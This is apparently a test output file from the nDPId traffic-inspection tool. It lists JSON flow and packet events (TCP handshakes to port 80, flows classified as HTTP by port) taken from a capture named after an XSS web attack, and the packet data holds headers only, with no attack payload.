-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1499347632635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347632635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d6hAAD4GTiisEAABwKgKMueKAFDGJwbjAAAAAKACchA3mAAAAgQFtAQCCAoBO3FLAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":2,"flow_last_seen":1499347632635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347632635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ54oMamRgxicG5KAScSCBBwAAAgQFtAQCCAoD5ULAATtxSwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5570,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":3,"flow_last_seen":1499347632636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347632636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d6lAAD4GTi+sEAABwKgKMueKAFDGJwbkDGpkYYAQAOUgDwAAAQEICgE7cUsD5ULA"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347635154,"flow_last_seen":1499347635154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347635154,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1499347635154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347635154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84sRAAD4G4wusEAABwKgKMuekAFB1fpEEAAAAAKACchD7kAAAAgQFtAQCCAoBO3PAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5588,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":2,"flow_last_seen":1499347635154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347635154,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ56RhPiSidX6RBaAScSAtdAAAAgQFtAQCCAoD5UU2ATtzwAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5590,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":3,"flow_last_seen":1499347635156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347635156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04sVAAD4G4xKsEAABwKgKMuekAFB1fpEFYT4ko4AQAOXMegAAAQEICgE7c8ED5UU2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347636429,"flow_last_seen":1499347636429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347636429,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1499347636429,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347636429,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AchAAD4GxAisEAABwKgKMueyAFDHeXU3AAAAAKACchDEFQAAAgQFtAQCCAoBO3T\/AAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5600,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":2,"flow_last_seen":1499347636429,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347636429,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ57LbsY4Yx3l1OKAScSAQ0QAAAgQFtAQCCAoD5UZ0ATt0\/wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5602,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":3,"flow_last_seen":1499347636431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347636431,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AclAAD4GxA+sEAABwKgKMueyAFDHeXU427GOGYAQAOWv1wAAAQEICgE7dQAD5UZ0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347637687,"flow_last_seen":1499347637687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1499347637687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347637687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0xAAD4GaoSsEAABwKgKMufAAFAySC12AAAAAKACchCfvwAAAgQFtAQCCAoBO3Y6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":2,"flow_last_seen":1499347637687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347637687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ58BffWshMkgtd6AScSCKawAAAgQFtAQCCAoD5UevATt2OgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":3,"flow_last_seen":1499347637688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347637688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W01AAD4GaousEAABwKgKMufAAFAySC13X31rIoAQAOUpcwAAAQEICgE7djoD5Uev"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347640199,"flow_last_seen":1499347640199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347640199,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1499347640199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347640199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81CZAAD4G8amsEAABwKgKMufaAFCvK6yIAAAAAKACchChOwAAAgQFtAQCCAoBO3iuAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":2,"flow_last_seen":1499347640199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347640199,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ59rwV\/OuryusiaAScSBwCwAAAgQFtAQCCAoD5UojATt4rgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5632,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":3,"flow_last_seen":1499347640200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347640200,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01CdAAD4G8bCsEAABwKgKMufaAFCvK6yJ8Ffzr4AQAOUPEwAAAQEICgE7eK4D5Uoj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347641440,"flow_last_seen":1499347641440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347641440,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1499347641440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347641440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tE5AAD4GEYKsEAABwKgKMufoAFB3dM2qAAAAAKACchC2jAAAAgQFtAQCCAoBO3nkAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":2,"flow_last_seen":1499347641440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347641440,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5+hNQiold3TNq6AScSDwxQAAAgQFtAQCCAoD5UtZATt55AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":3,"flow_last_seen":1499347641442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347641442,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tE9AAD4GEYmsEAABwKgKMufoAFB3dM2rTUIqJoAQAOWPzQAAAQEICgE7eeQD5UtZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347642716,"flow_last_seen":1499347642716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347642716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1499347642716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347642716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SnNAAD4Ge12sEAABwKgKMuf2AFDcdDFQAAAAAKACchDsmQAAAgQFtAQCCAoBO3sjAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":2,"flow_last_seen":1499347642716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347642716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5\/aPKcRJ3HQxUaAScSBJiAAAAgQFtAQCCAoD5UyYATt7IwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":3,"flow_last_seen":1499347642717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347642717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnRAAD4Ge2SsEAABwKgKMuf2AFDcdDFRjynESoAQAOXojwAAAQEICgE7eyMD5UyY"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347645232,"flow_last_seen":1499347645232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347645232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1499347645232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347645232,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rz5AAD4GFpKsEAABwKgKMugQAFBzf9KmAAAAAKACchCxqQAAAgQFtAQCCAoBO32YAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5673,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":2,"flow_last_seen":1499347645232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347645232,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6BD8Et+tc3\/Sp6AScSCD1QAAAgQFtAQCCAoD5U8NATt9mAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5675,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":3,"flow_last_seen":1499347645234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347645234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rz9AAD4GFpmsEAABwKgKMugQAFBzf9Kn\/BLfroAQAOUi3QAAAQEICgE7fZgD5U8N"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347646486,"flow_last_seen":1499347646486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347646486,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1499347646486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347646486,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uWhAAD4GDGisEAABwKgKMugeAFCoNce5AAAAAKACchCGmQAAAgQFtAQCCAoBO37RAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":2,"flow_last_seen":1499347646486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347646486,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6B6AVzWvqDXHuqAScSB9RgAAAgQFtAQCCAoD5VBGATt+0QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":3,"flow_last_seen":1499347646488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347646488,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uWlAAD4GDG+sEAABwKgKMugeAFCoNce6gFc1sIAQAOUcTQAAAQEICgE7ftID5VBG"} 